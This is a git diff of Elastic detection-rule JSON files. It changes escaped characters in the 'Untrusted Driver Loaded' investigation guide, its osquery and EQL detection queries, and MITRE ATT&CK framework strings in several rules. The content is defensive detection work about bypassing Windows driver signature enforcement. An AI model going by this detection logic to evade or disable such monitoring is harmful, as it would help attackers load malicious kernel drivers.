VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", "references": [ "https://github.com/hfiref0x/TDL", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_5.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_5.json index 470326da766..c10c7f385c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_5.json +++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_5.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Untrusted Driver Loaded", - "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", "references": [ "https://github.com/hfiref0x/TDL", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_6.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_6.json index 9fb29125d99..d2cd98dab02 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_6.json +++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_6.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Untrusted Driver Loaded", - "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", "references": [ "https://github.com/hfiref0x/TDL", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_105.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_105.json index f77a9d2c665..002f92109c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_106.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_106.json index ea06a80cdc0..68feef3aec9 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_107.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_107.json index 77dcb0c62c0..ec7fc87e213 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_208.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_208.json index 4a3f65af53a..a7377d07a3f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_208.json +++ b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_104.json b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_104.json index eb6ef776f3f..f7f39191dbe 100644 --- a/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d99a037b-c8e2-47a5-97b9-170d076827c4_104.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git 